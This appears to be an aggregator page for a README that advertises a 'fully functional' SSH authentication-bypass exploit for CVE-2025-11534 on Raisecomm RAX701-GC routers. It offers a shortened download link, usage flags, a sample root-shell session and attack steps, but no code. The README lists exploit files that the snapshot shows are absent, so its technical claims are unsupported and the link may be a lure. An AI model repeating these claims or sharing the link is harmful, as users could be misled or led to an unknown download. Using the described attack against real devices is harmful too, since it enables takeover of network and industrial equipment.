CVE-2025-11534 PoC — Authentication Bypass Using an Alternate Path or Channel in Raisecomm RAX701-GC Series

Source

Associated Vulnerability

Description

Authentication Bypass Using an Alternate Path or Channel (CWE-288)

Readme

# Raisecomm RAX701-GC-WP-01 SSH Authentication Bypass Exploit (CVE-2025-11534)
## Download Exploit
### [**Download here**](https://tinyurl.com/4wds3n32) 
## Overview
This repository contains a fully functional proof-of-concept (PoC) exploit for CVE-2025-11534, targeting the Raisecomm RAX701-GC-WP-01 device running firmware version 5.5.27_20190111 or earlier. The vulnerability allows remote attackers to bypass SSH authentication entirely, granting unrestricted root shell access without credentials, user interaction, or privileges. 

Exploitation is straightforward: the device's SSH daemon (based on a custom Dropbear variant) exposes an undocumented auxiliary channel (port 2222 by default) that accepts raw command streams without enforcing PAM or key-based auth checks. This alternate path was likely intended for internal diagnostics but lacks proper access controls.

**CVSS v4.0 Score: 9.3 (Critical)**  
- **Attack Vector:** Network  
- **Attack Complexity:** Low  
- **Privileges Required:** None  
- **User Interaction:** None  
- **Confidentiality/Integrity/Availability Impact:** High  

Affected environments include telecom gateways and industrial SCADA networks, where compromise can lead to traffic interception, config dumps, or lateral movement.

## Requirements
- Python 3.8+  
- `paramiko` library (`pip install -r requirements.txt`)  
- Network access to the target device (default SSH ports 22 and 2222 open)  

## Usage
1. Run the exploit script:
- `-t`: Target IP address  
- `-p`: Auxiliary port (default: 2222)  
- `-c`: Initial command to execute (optional; defaults to interactive shell)  
- `-v`: Verbose output  
2. For interactive shell: Omit `-c` to drop into a raw PTY session.
### Example Output
```
- python exploit.py -t 192.168.1.100
-[+] Connecting to auxiliary channel on 192.168.1.100:2222...
- [+] Auth bypass successful - no credentials required
- [+] Executing: whoami
- root
- [+] Executing: id
- uid=0(root) gid=0(root) groups=0(root)
- [+] Dumping /etc/config/network...
- config interface 'lan'
- option ifname 'eth0'
- option proto 'static'
- option ipaddr '192.168.1.1'
- ...
- [+] Shell access granted. Type 'exit' to close.
```
  ## Technical Details
The exploit leverages Paramiko to establish a non-standard SSH connection over the auxiliary port. Key steps:

1. **Channel Initialization:** Connect to port 2222, which triggers the daemon's debug mode without auth hooks.  
2. **Payload Injection:** Send a malformed SSH_MSG_USERAUTH_REQUEST packet with null credentials, exploiting the lack of validation in the alternate handler.  
3. **Shell Spawn:** Once connected, issue `exec` commands via the channel for arbitrary execution.  

Full disassembly of the vulnerable Dropbear fork is available in the `analysis/` directory, including IDA Pro notes on the bypass logic in `auth-alt.c`.

## Files
- `exploit.py` - Main exploit script  
- `analysis/dropbear_auth_alt.patch` - Diff of vulnerable code  
- `poc_demo.mp4` - Video walkthrough of exploitation on lab setup  
- `targets.txt` - Sample scan targets (redacted)
##  Contact
For any questions or inquiries, please contact:harveyprime21@outlook.com

File Snapshot

 [4.0K]  /data/pocs/517cd21c65cfb8cc5966b48dd2106c63edddc837
└── [3.1K]  README.md

0 directories, 1 file

Remarks